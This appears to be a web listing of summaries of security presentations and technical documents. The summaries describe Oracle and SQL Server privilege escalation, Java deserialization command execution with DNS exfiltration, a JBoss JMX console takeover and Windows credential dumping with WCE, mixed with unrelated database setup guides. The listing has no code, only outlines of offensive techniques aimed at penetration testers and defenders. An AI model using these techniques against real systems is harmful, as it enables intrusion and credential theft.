This document discusses a vulnerability in Oracle databases that allows privilege escalation from CREATE USER privileges to SYSDBA privileges. It provides code examples demonstrating how a user with CREATE USER privileges can create a function with the same name as a built-in SYS function to override the namespace and elevate their privileges when SYS executes the function. The document outlines best practices for prevention, including not logging in as SYS, closely monitoring CREATE USER privileges, and using a tool like Sentrigo Hedgehog for advanced monitoring and alerts. It also provides recommendations for forensic response if privilege escalation occurs.
This document discusses exploiting the Java deserialization vulnerability to achieve remote code execution on targets. It identifies the vulnerability by examining serialized Java objects and using automated scanning tools. Various techniques for blind command execution are demonstrated, including using time delays and appending output to DNS queries. Methods for dealing with limitations of command execution without a shell are also covered. The document shows how to exfiltrate data, stage tools, and conduct reconnaissance on targets by manipulating DNS queries. Mitigation strategies like deserialization whitelisting are discussed.
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerNetSPI
Scott Sutherland and Alexander Leary present at Secure360 Twin Cities 2018 on Owning the Empire Through SQL Server.
Presentation includes five objectives:
- Get Access
- Hide from Audit Controls
- Execute OS Commands
- Use SQL Server as a breach head
- Detect OS Comment Execution
Questions? Contact @0xbadjuju or @_nullbind on Twitter.
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation.
This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
The document discusses configuring JBoss to work behind a firewall by modifying socket-based services that open listening ports. It lists several key JBoss services that open ports by default, including the naming service on port 1098, invoker services on ports 4444 and 4445, and others. It provides the configuration files and attributes to modify ports for each service.
Upgrade 11.2.0.1 rac db to 11.2.0.2 in linuxmaclean liu
The document provides steps to upgrade an Oracle database from 11.2.0.1 to 11.2.0.2 on Linux. It details downloading the 11.2.0.2 patch set, installing the new 11.2.0.2 database software in a new location using OUI, and preparing the database for upgrade by cleaning data dictionary tables, taking backups, and collecting statistics. The preparation steps help ensure a smooth upgrade of the database instance and data dictionary to the new version.
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
This is the presentation we provided at the 2018 Blackhat USA Arsenal to introduce PowerUpSQL. PowerUpSQL includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server. This should be interesting to red, blue, and purple teams interested in automating day to day tasks involving SQL Server.
More information can be found at:
https://github.com/NetSPI/PowerUpSQL/wiki
This document discusses exploiting the Java deserialization vulnerability to achieve remote code execution on targets. It identifies the vulnerability by examining serialized Java objects and using automated scanning tools. Various techniques for blind command execution are demonstrated, including using time delays and appending output to DNS queries. Methods for dealing with limitations of command execution without a shell are also covered. The document shows how to exfiltrate data, stage tools, and conduct reconnaissance on targets by manipulating DNS queries. Mitigation strategies like deserialization whitelisting are discussed.
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerNetSPI
Scott Sutherland and Alexander Leary present at Secure360 Twin Cities 2018 on Owning the Empire Through SQL Server.
Presentation includes five objectives:
- Get Access
- Hide from Audit Controls
- Execute OS Commands
- Use SQL Server as a breach head
- Detect OS Comment Execution
Questions? Contact @0xbadjuju or @_nullbind on Twitter.
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation.
This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
The document discusses configuring JBoss to work behind a firewall by modifying socket-based services that open listening ports. It lists several key JBoss services that open ports by default, including the naming service on port 1098, invoker services on ports 4444 and 4445, and others. It provides the configuration files and attributes to modify ports for each service.
Upgrade 11.2.0.1 rac db to 11.2.0.2 in linuxmaclean liu
The document provides steps to upgrade an Oracle database from 11.2.0.1 to 11.2.0.2 on Linux. It details downloading the 11.2.0.2 patch set, installing the new 11.2.0.2 database software in a new location using OUI, and preparing the database for upgrade by cleaning data dictionary tables, taking backups, and collecting statistics. The preparation steps help ensure a smooth upgrade of the database instance and data dictionary to the new version.
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
This is the presentation we provided at the 2018 Blackhat USA Arsenal to introduce PowerUpSQL. PowerUpSQL includes functions that support SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server. This should be interesting to red, blue, and purple teams interested in automating day to day tasks involving SQL Server.
More information can be found at:
https://github.com/NetSPI/PowerUpSQL/wiki
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation. This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
2017 Thotcon - Hacking SQL Servers on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
This document describes how to hack a default JBoss installation using the JMX console by deploying a web application that executes system commands. It explains how to create a WAR file with a JSP that allows command execution, deploy it to JBoss by adding the URL to the DeploymentScanner, and then use the application to execute commands with the privileges of the JBoss server. It concludes by providing information on securing the JMX console to prevent this type of attack.
This document provides an overview of SQL injection and how to use the SQLMap tool to exploit SQL injection vulnerabilities. It begins with background on SQL injection as the first OWASP Top 10 vulnerability. It then explains how SQL injection works and common techniques. The bulk of the document focuses on using SQLMap to identify and exploit SQL injection flaws, including enumerating databases, tables, columns, and extracting data. It describes options to escalate access using SQLMap to interface with the operating system and access the file system and registry. Tamper scripts for bypassing web application firewalls are also discussed. The goal is to achieve "one click 0wnage" of systems with SQL injection vulnerabilities using SQLMap's powerful features.
A summary of core data optimization in iOS app. How to search in the large database having more than 100k records.
Perform a search on different types of tags in core data.
Armitage developed by Raphael mudge a gui format for metasploit framework for pentesr and security researcher,here u can manage as also prevent the cyber attack.this project means for educational purpose only.do not use as crime
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation. This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
This document describes how to enable Oracle Database Vault 11gR2. It outlines the software and environment needed, including Oracle Database 11.2.0.4. It provides steps to enable the Database Vault option using SQL commands and the Database Configuration Assistant. These include shutting down the database, making changes to enable certain options, and configuring Database Vault using the DBCA interface. Once complete, the Database Vault configuration screens can be accessed.
12c (12.1) Database installation on Solaris 11(11.2)K Kumar Guduru
1) The document provides steps to install Oracle Database 12c on Solaris 11.2. It includes installing prerequisite packages, configuring the system, creating the oracle user and groups, and running the Oracle installation.
2) Key steps are configuring the system hostname and IP address, editing configuration files like sshd_config, and installing prerequisite Oracle packages.
3) The Oracle software is extracted, Oracle user and groups are created, and permissions are set on the Oracle inventory and software directories.
4) The Oracle Database installer is run, including selecting a database configuration, providing passwords, and executing root scripts. Post-installation checks confirm the database and listeners are configured correctly.
The document provides instructions for installing Oracle Enterprise Manager Cloud Control 12c and configuring its components. Key steps include:
1. Installing the Oracle Management Server (OMS) and configuring its database connection and ports.
2. Installing agents on an Oracle SOA clustered domain and configuring auto-discovery and promotion of targets to managed state.
3. Installing the JVMD (JVM Diagnostics) manager to monitor JVMs, which requires resynchronizing agents, selecting the application performance agent, and configuring a managed server.
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
The document discusses hacking SQL Server at scale using PowerShell. It provides an overview of PowerUpSQL, an open source PowerShell toolkit for SQL Server discovery, auditing, and privilege escalation. Key sections include SQL Server discovery techniques using PowerUpSQL, methods for escalating privileges such as from a domain user to SQL login or SQL login to sysadmin, and post-exploitation activities like impersonation. The presentation emphasizes the benefits of using PowerShell for SQL attacks including avoiding detection by running commands in memory and leveraging existing trusted tools.
how to protect your sensitive data using oracle database vaultAnar Godjaev
- Oracle Database Vault provides powerful security controls to help protect sensitive application data from unauthorized access and comply with privacy regulations. It controls privileged account access and sensitive operations inside the database using multi-factor authorization.
- Database Vault realms prevent privileged accounts from accessing application schemas, sensitive tables, and stored procedures. It also controls database configuration changes and prevents unauthorized changes to database entitlements.
- Database Vault is configured easily and runs transparently with minimal performance impact. It implements duty separation, restricting even DBA users' access and controling database operations. Once enabled, it provides strong protection of applications and data.
The document discusses writing MySQL scripts using Python's DB-API module. It provides a short 3-sentence summary of the document:
1) Python's DB-API module provides a database application programming interface and the MySQLdb driver allows it to access MySQL databases.
2) An example script is presented that connects to a MySQL database, issues a query to get the server version, and prints the result.
3) The document also discusses using cursors to execute statements and fetch results, handling errors, and retrieving results as tuples or dictionaries.
This document provides instructions for installing Oracle WebLogic 12c on Docker. It describes downloading and installing Docker, checking available disk space, configuring the host file and network settings. Instructions are provided for installing Git and cloning the Oracle Docker repository. The document then guides setting up the required Java and FMW software, building a Docker image, creating a WebLogic domain, and running the Admin Server and Managed Server containers on Docker.
Upgrade 11.2.0.1 gi crs to 11.2.0.2 in linuxmaclean liu
This document provides instructions for upgrading the Grid Infrastructure (GI) from 11.2.0.1 to 11.2.0.2 on Linux. It notes that there are two bugs in the 11.2.0.1 to 11.2.0.2 upgrade and that to successfully perform the upgrade, the bugs must be addressed by applying patches 9413827 and 9706490, and modifying a configuration file. It then outlines the steps to take which include downloading patches, installing a new version of Opatch, applying patch 9413827, and performing the rolling upgrade of GI.
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally we?ll show how PowerShell automation can be used to execute the SQL Server attacks on scale. All scripts created and demonstrated during the presentation will be open sourced. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
This document discusses various topics related to user management in MariaDB databases including:
1) Creating users and specifying host names, authentication plugins, TLS options, and resource limits.
2) Granting and revoking user privileges at the global, database, table, column, function and procedure level.
3) Implementing role-based access control (RBAC) with roles.
4) Configuring password validation plugins.
This document discusses SQL injection and the sqlmap tool. It provides an overview of SQL injection, describes how sqlmap can be used to find and exploit SQL injection vulnerabilities, and demonstrates how it can be used to enumerate databases and files systems, and in some cases obtain remote access. It also discusses mitigation techniques like input sanitization and using prepared statements.
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation. This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
2017 Thotcon - Hacking SQL Servers on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally I’ll show how PowerShell automation can be used to execute the SQL Server attacks on scale with PowerUpSQL. All scripts demonstrated during the presentation are available on GitHub. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
This document describes how to hack a default JBoss installation using the JMX console by deploying a web application that executes system commands. It explains how to create a WAR file with a JSP that allows command execution, deploy it to JBoss by adding the URL to the DeploymentScanner, and then use the application to execute commands with the privileges of the JBoss server. It concludes by providing information on securing the JMX console to prevent this type of attack.
This document provides an overview of SQL injection and how to use the SQLMap tool to exploit SQL injection vulnerabilities. It begins with background on SQL injection as the first OWASP Top 10 vulnerability. It then explains how SQL injection works and common techniques. The bulk of the document focuses on using SQLMap to identify and exploit SQL injection flaws, including enumerating databases, tables, columns, and extracting data. It describes options to escalate access using SQLMap to interface with the operating system and access the file system and registry. Tamper scripts for bypassing web application firewalls are also discussed. The goal is to achieve "one click 0wnage" of systems with SQL injection vulnerabilities using SQLMap's powerful features.
A summary of core data optimization in iOS app. How to search in the large database having more than 100k records.
Perform a search on different types of tags in core data.
Armitage developed by Raphael mudge a gui format for metasploit framework for pentesr and security researcher,here u can manage as also prevent the cyber attack.this project means for educational purpose only.do not use as crime
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
During this presentation, we’ll cover interesting techniques for executing operating system commands through SQL Server that can be used to avoid detection and maintain persistence during red team engagements. We’ll also talk about automating attacks through PowerShell Empire and PowerUpSQL. This will include a review of command execution through custom extended stored procedures, CLR assemblies, WMI providers, R scripts, python scripts, agent jobs, and custom ole objects. We’ll also dig into some new integrations with PowerShell Empire. All code and slide decks will be released during the presentation. This should be interesting to blue teamers looking for a faster way to test their detective control capabilities and red teamers looking for a practical way to avoid detection while trying to maintain access to their target environments.
This document describes how to enable Oracle Database Vault 11gR2. It outlines the software and environment needed, including Oracle Database 11.2.0.4. It provides steps to enable the Database Vault option using SQL commands and the Database Configuration Assistant. These include shutting down the database, making changes to enable certain options, and configuring Database Vault using the DBCA interface. Once complete, the Database Vault configuration screens can be accessed.
12c (12.1) Database installation on Solaris 11(11.2)K Kumar Guduru
1) The document provides steps to install Oracle Database 12c on Solaris 11.2. It includes installing prerequisite packages, configuring the system, creating the oracle user and groups, and running the Oracle installation.
2) Key steps are configuring the system hostname and IP address, editing configuration files like sshd_config, and installing prerequisite Oracle packages.
3) The Oracle software is extracted, Oracle user and groups are created, and permissions are set on the Oracle inventory and software directories.
4) The Oracle Database installer is run, including selecting a database configuration, providing passwords, and executing root scripts. Post-installation checks confirm the database and listeners are configured correctly.
The document provides instructions for installing Oracle Enterprise Manager Cloud Control 12c and configuring its components. Key steps include:
1. Installing the Oracle Management Server (OMS) and configuring its database connection and ports.
2. Installing agents on an Oracle SOA clustered domain and configuring auto-discovery and promotion of targets to managed state.
3. Installing the JVMD (JVM Diagnostics) manager to monitor JVMs, which requires resynchronizing agents, selecting the application performance agent, and configuring a managed server.
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
The document discusses hacking SQL Server at scale using PowerShell. It provides an overview of PowerUpSQL, an open source PowerShell toolkit for SQL Server discovery, auditing, and privilege escalation. Key sections include SQL Server discovery techniques using PowerUpSQL, methods for escalating privileges such as from a domain user to SQL login or SQL login to sysadmin, and post-exploitation activities like impersonation. The presentation emphasizes the benefits of using PowerShell for SQL attacks including avoiding detection by running commands in memory and leveraging existing trusted tools.
how to protect your sensitive data using oracle database vaultAnar Godjaev
- Oracle Database Vault provides powerful security controls to help protect sensitive application data from unauthorized access and comply with privacy regulations. It controls privileged account access and sensitive operations inside the database using multi-factor authorization.
- Database Vault realms prevent privileged accounts from accessing application schemas, sensitive tables, and stored procedures. It also controls database configuration changes and prevents unauthorized changes to database entitlements.
- Database Vault is configured easily and runs transparently with minimal performance impact. It implements duty separation, restricting even DBA users' access and controling database operations. Once enabled, it provides strong protection of applications and data.
The document discusses writing MySQL scripts using Python's DB-API module. It provides a short 3-sentence summary of the document:
1) Python's DB-API module provides a database application programming interface and the MySQLdb driver allows it to access MySQL databases.
2) An example script is presented that connects to a MySQL database, issues a query to get the server version, and prints the result.
3) The document also discusses using cursors to execute statements and fetch results, handling errors, and retrieving results as tuples or dictionaries.
This document provides instructions for installing Oracle WebLogic 12c on Docker. It describes downloading and installing Docker, checking available disk space, configuring the host file and network settings. Instructions are provided for installing Git and cloning the Oracle Docker repository. The document then guides setting up the required Java and FMW software, building a Docker image, creating a WebLogic domain, and running the Admin Server and Managed Server containers on Docker.
Upgrade 11.2.0.1 gi crs to 11.2.0.2 in linuxmaclean liu
This document provides instructions for upgrading the Grid Infrastructure (GI) from 11.2.0.1 to 11.2.0.2 on Linux. It notes that there are two bugs in the 11.2.0.1 to 11.2.0.2 upgrade and that to successfully perform the upgrade, the bugs must be addressed by applying patches 9413827 and 9706490, and modifying a configuration file. It then outlines the steps to take which include downloading patches, installing a new version of Opatch, applying patch 9413827, and performing the rolling upgrade of GI.
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
This presentation will provide an overview of common SQL Server discovery, privilege escalation, persistence, and data targeting techniques. Techniques will be shared for escalating privileges on SQL Server and associated Active Directory domains. Finally we?ll show how PowerShell automation can be used to execute the SQL Server attacks on scale. All scripts created and demonstrated during the presentation will be open sourced. This should be useful to penetration testers and system administrators trying to gain a better understanding of their SQL Server attack surface and how it can be exploited.
This document discusses various topics related to user management in MariaDB databases including:
1) Creating users and specifying host names, authentication plugins, TLS options, and resource limits.
2) Granting and revoking user privileges at the global, database, table, column, function and procedure level.
3) Implementing role-based access control (RBAC) with roles.
4) Configuring password validation plugins.
This document discusses SQL injection and the sqlmap tool. It provides an overview of SQL injection, describes how sqlmap can be used to find and exploit SQL injection vulnerabilities, and demonstrates how it can be used to enumerate databases and files systems, and in some cases obtain remote access. It also discusses mitigation techniques like input sanitization and using prepared statements.
(Graphic Design Sample Work)
Developed and expanded from Design Template for "Entrepreneurship & Innovation 2006" document also in slideshare.
last updated: June 2007
This document provides information about job application letters and resumes. It defines a job letter/cover letter as a letter that accompanies a resume to introduce qualifications to a potential employer for a specific position. The purpose is to demonstrate interest in the company/position and motivate the employer to interview the applicant. A job letter should highlight relevant skills and experience for the role. Resumes contain educational and employment history to apply for jobs. The document outlines the typical components and formatting of effective job letters and resumes.
在2014 年 4 月 //learn/ - Global Community Webcast Event 微軟全球線上廣播活動中,所講述到有關 Tiles, badges and toasts and action center 的課程。
http://channel9.msdn.com/Blogs/twmvp/Tiles-badges-and-toasts-and-action-center
sample code: http://goo.gl/ydh1tk
A trojan is a type of malware that appears to perform a desirable function but hides malicious code that allows unauthorized access to a system. Some key points about trojans:
- Trojans are often disguised as legitimate files to trick users into running them. Common file types used for trojans include executable files (.exe), dynamic link libraries (.dll), scripts (.vbs, .js), and compressed files (.zip, .rar).
- Once activated, a trojan may allow attackers to install additional malware, steal data, use system resources for cryptomining or DDoS attacks, and more.
- Common trojan delivery methods include email attachments, compromised/malicious websites, peer-to-
The document discusses test-driven development (TDD). It describes TDD as writing tests before code in order to think about how to use components before implementing them. This results in components that are easy to test and enhance. The TDD process involves red-green-refactor cycles of writing a failing test, making it pass with minimal code, then refactoring. TDD is done at both the unit test and acceptance test levels during iterative software development. Tools like JUnit and IDEs are recommended to automate and facilitate the TDD process.
Rails simplifies the software development process through conventions over configuration and by embracing agile practices. Rails uses simple naming conventions and reflection so that developers can focus on business logic rather than configuration. This allows features like MVC, DRY principles and database mapping to work automatically without extensive setup. The combination of Ruby's elegance and Rails' conventions makes building applications faster and easier for developers.
This document outlines questions to help determine how a course impacts a person's project or team goals. It asks what the focus areas and expected outcomes are, what critical actions need to be taken to achieve key results, what those key results are expected to be, and how the key results will impact project or team goals.
Configuring Oracle Enterprise Manager Cloud Control 12c for HA White PaperLeighton Nelson
This document discusses configuring Oracle Enterprise Manager Cloud Control 12c for high availability. It outlines four levels of high availability configurations, with levels 1-3 utilizing separate hosts, active/passive failover, and multiple active/active OMS instances respectively. Level 2 implements an active/passive configuration with the OMS on shared storage and a virtual IP address, while the repository uses local Data Guard. The document provides detailed steps for setting up a level 2 configuration using Oracle Clusterware for failover of the virtual IP and OMS between nodes.
This document provides an overview and agenda for a presentation on Yocto, an open source project for embedded Linux development. It discusses Yocto components, layers, recipes, classes, and the build system. It also outlines how Yocto can be used by both system developers and application developers.
Este documento describe varios tipos de ataques a sitios web y cómo protegerse de ellos. Explica amenazas como inyecciones SQL, XSS y Denegación de Servicio, y métodos de autentificación, autorización y validación débiles. También recomienda implementar un cortafuegos de aplicaciones web, monitorear el contenido, usar autenticación multifactor y hospedar el sitio de manera segura.
Sql injection bao cao - http://ouo.io/Mqc8L5phanleson
Course : Introduction to Big Data with Apache Spark : http://ouo.io/Mqc8L5
Course : Spark Fundamentals I : http://ouo.io/eiuoV
Course : Functional Programming Principles in Scala : http://ouo.io/rh4vv
Firebird Security (in English): The Past and The FutureAlexey Kovyazin
This document discusses the history and development of security in Firebird databases. It describes how security was initially approached for early versions of InterBase, then improvements made over time in Firebird versions 1.0 through 3.0. Key points covered include adding user authentication, addressing buffer overflows, implementing Windows trusted authentication, and plans for Firebird 3 to allow custom authentication plugins and mapping of operating system users to database roles.
New and improved hacking oracle from web apps sumit sidharthowaspindia
This document discusses hacking Oracle databases from web applications. It describes how SQL injection vulnerabilities in web apps connected to Oracle databases can be used to escalate privileges and execute operating system commands. Specifically, it outlines how the dbms_xmlquery.newcontext() and dbms_xmlquery.getxml() functions allow executing arbitrary PL/SQL, which can then exploit other vulnerabilities to gain DBA access privileges and run operating system code. Examples are provided that demonstrate exploiting vulnerabilities to gain DBA privileges and executing Metasploit payloads on the database server.
Writing & Sharing Great Modules - Puppet Camp BostonPuppet
This document provides best practices and guidance for writing and sharing Puppet modules. It discusses separating logic from data, using semantic versioning (SemVer), creating modules as interfaces, reusing existing modules from the Puppet Forge, and establishing a community to collaborate on modules. The key recommendations are to separate configuration data from logic, use SemVer to avoid breaking changes, make modules opinionated but allow overrides, leverage existing modules, and engage the community to improve modules.
This document discusses Oracle DbNest and Linux containers. It begins by defining DbNest and containers, then discusses the fundamental Linux technologies they are based on such as namespaces, cgroups, capabilities, and seccomp. It provides details on specific namespaces like mount, PID, user, and network namespaces. It also discusses capabilities, cgroups, bind mounting, and pivot rooting. The document concludes with a demonstration of building containers and filtering syscalls with seccomp profiles.
This along with the binaries to be found at my github profiles @ github.com/shahenshah99 is used to present and conduct a hands-on session on securely deploying containers in docker at the time of production
Higher order infrastructure: from Docker basics to cluster management - Nicol...Codemotion
The container abstraction hit the collective developer mind with great force and created a space of innovation for the distribution, configuration and deployment of cloud based applications. Now that this new model has established itself work is moving towards orchestration and coordination of loosely coupled network services. There is an explosion of tools in this arena at different degrees of stability but the momentum is huge. On the above premise this session we'll give an overview of the orchestration landscape and a (semi)live demo of cluster management using a sample application.
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
The document discusses vulnerabilities found in various database software products through analyzing their code and installation directories. Local privilege escalation bugs were found in IBM DB2 and Informix by exploiting how environment variables and shared libraries were handled. Remote code execution bugs were also discovered in UniData and Informix through fuzzing protocols and by exploiting unsafe functions. The document encourages searching for more bugs in database software.
The document discusses new security concepts introduced in Oracle Multitenant. Key points include:
- Common users exist across all pluggable databases in a container database while local users are specific to a single pluggable database.
- Common users are created in the root container and can access all pluggable databases while local users are limited to a single database.
- The set container privilege allows common users to switch between pluggable databases without reconnecting. This privilege needs to be granted carefully.
- Data dictionary and performance views aggregate information across all pluggable databases when queried from the root container.
This document discusses the importance of patching databases to address security vulnerabilities. It notes that while patching does not guarantee security, it is a fundamental technique for addressing threats from known problems. The document advises tracking security bulletins from vendors to understand where your database environment may be vulnerable, as vendors do not always release patches for every issue. Patching can help reduce exposure to attacks during the inherent time delay between a vulnerability being discovered and patched. However, patching is difficult and testing/applying patches can also delay fixing issues.
RMAN was used to clone an Oracle 10g RAC database from a source database SOURCEC3 to a target database TARGETC3 using the DUPLICATE DATABASE feature. The procedure involved preparing the source and target databases, identifying necessary archive log backups, restoring the database to a single-instance target, and then converting it to a RAC database by adding redo logs and enabling cluster functionality. Post-clone tasks verified the successful conversion to a RAC database and started required processes.
The document describes the namespace attachment feature for LXC containers which allows processes to attach to the namespaces of other processes, providing de-isolation between containers and hosts. It specifies how namespace attachment works using the setns() system call and files in the /proc directory, and discusses integrating this feature into the LXC container by modifying its source code and libraries. Use cases where breaking isolation may be acceptable are also outlined.
This document provides instructions for setting up a Maven project using Hibernate. It begins by having the user generate a Maven project structure using the mvn archetype:create command. It then instructs the user to add the Hibernate dependency to the pom.xml file. The document also specifies adding a compiler plugin configuration to the pom.xml and creating a resources directory for the Hibernate configuration file. Overall, the document outlines the basic steps to initialize a Maven project and integrate Hibernate through dependency management and configuration, requiring minimal additional configuration compared to traditional build systems.
RMAN has evolved since Oracle 8i and includes new features in Oracle 12c that help reduce downtime. In 12c, a container database can include pluggable databases. RMAN supports backup and recovery of container databases and individual pluggable databases. New features in 12c include the SYSBACKUP privilege which allows backups without granting full SYSDBA privileges, and support for multitenant container databases and pluggable databases.
This document provides instructions for converting an existing standard 2-node Oracle RAC environment to use Flex Clusters and Flex ASM in Oracle 12c. It describes Flex Clusters, which introduce Hub and Leaf nodes, and Flex ASM, which allows ASM instances to run on separate physical servers. The instructions show how to check the current cluster and ASM modes, and then use the ASM Configuration Assistant GUI to convert to Flex ASM, selecting the default listener and private interconnect for ASM network traffic.
Appsecco Kubernetes Hacking Masterclass. The slides used during the class with links to the commands, scripts and setup information.
These slides are to be used with the masterclass video recording on YouTube -
Hands on exercises are highly recommended to get the most out of this class!
This document provides an overview of security features in UNIX and Linux operating systems. It discusses permissions, access control lists, mandatory access control, password hashing, system patching, sandboxing users and services, and other security concepts. The document aims to educate readers on basic and advanced security techniques available in UNIX/Linux to protect systems from threats.
T3 is an optimized protocol used to transport data between WebLogic Server and other Java programs. WebLogic Server tracks each Java Virtual Machine (JVM) it connects to and creates a single T3 connection to carry all traffic for a JVM. For example, if a client accesses an enterprise bean and JDBC connection pool on WebLogic Server, a single network connection is established between the WebLogic Server JVM and the client JVM.
Percona Cluster with Master_Slave for Disaster RecoveryRam Gautam
The document describes setting up asynchronous master-slave database replication between a production database cluster and a disaster recovery database cluster using Percona tools. It provides configuration details for the master and slave databases including enabling binary logging and setting the server IDs. The process involves taking a backup of the master database using Innobackupex, preparing the backup, and copying it to the slave database server. Replication is then started by configuring the master to replicate and the slave as a replica.
This document discusses using AllegroCache with a multi-threaded web server application. It describes the challenges of using AllegroCache in a multi-threaded environment where multiple threads need to access the database simultaneously. It then provides code for a simple password database application using AllegroCache that can be accessed by multiple threads of a web server safely. The code defines functions for creating and opening the password database, getting and setting password values for a given user, and closing the database.
Penetration Testing for Easy RM to MP3 Converter Application and Post ExploitJongWon Kim
The document discusses penetration testing of the Easy RM to MP3 Converter application. It begins by setting up the testing environment with Backtrack5, Windows SP2 and SP3 virtual machines, and the vulnerable application. It then analyzes the application dynamically using a debugger to find a buffer overflow vulnerability. The document creates an exploit payload that uses return oriented programming (ROP) to bypass data execution prevention (DEP) and execute shellcode to connect back to the attacker machine for post-exploit access.
The document describes Windows Credentials Editor (WCE), a tool that manipulates Windows logon sessions to dump and modify credentials in memory. WCE has two main features - it can dump in-memory credentials like usernames, domains, and NTLM hashes from current, future, and terminated logon sessions; and it supports pass-the-hash by allowing changes to NTLM credentials or creation of new logon sessions with arbitrary credentials. The document discusses two methods WCE could use - directly calling authentication package APIs, which requires running code in LSASS; or reading LSASS memory to locate logon session and credential structures and decrypt credentials without injecting code.
